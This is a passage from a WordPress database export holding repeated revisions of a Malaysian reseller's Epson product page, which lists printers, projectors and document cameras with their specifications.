height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 17:28:51','2019-09-25 09:28:51','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3474,1,'2019-09-25 17:33:36','2019-09-25 09:33:36','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /><br>\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Speed: Up to 30ppm</li>\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\n 	<li>Quality prints with new Epson Technologies</li>\n 	<li>New print job management features</li>\n</ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /><br>\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 35ppm</li>\n 	<li>Auto-Duplex</li>\n 	<li>Ethernet &amp; Epson iPrint</li>\n 	<li>2 optional paper cassette tray</li>\n</ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /><br><br>\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 40 ppm</li>\n 	<li>Epson iPrint</li>\n 	<li>Ethernet</li>\n 	<li>4 optional cassette trays</li>\n</ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 17:33:36','2019-09-25 09:33:36','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3475,1,'2019-09-25 17:34:34','2019-09-25 09:34:34','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years 